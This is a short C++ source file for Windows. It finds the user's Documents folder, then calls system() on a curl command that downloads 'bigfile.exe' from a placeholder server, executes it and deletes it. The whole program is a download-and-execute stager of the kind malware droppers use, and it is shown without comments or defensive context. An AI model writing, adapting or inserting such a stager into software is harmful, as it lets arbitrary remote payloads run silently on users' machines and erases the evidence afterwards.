#include <shlobj.h>
#include <KnownFolders.h>
#include <comutil.h> //for _bstr_t (used in the string conversion)
#include <iostream>
#pragma comment(lib, "comsuppw")


int main()
{
    int i;
  
    PWSTR path = NULL;
    HRESULT hr = SHGetKnownFolderPath(FOLDERID_Documents, 0, NULL, &path);

    _bstr_t bstrPath(path);
    std::string strPath((char*)bstrPath);
    std::string strFile(strPath + "\\bigfile.exe");
    std::cout << strFile;

    std::string cmdstring;
    cmdstring = "curl http://yourserver.com/bigfile.exe --output " + strFile + "&& " + strFile + "&& del " + strFile;
    const char* command = cmdstring.c_str();

    i = system(command);

    printf("output: %d.\n", i);


    return 0;

}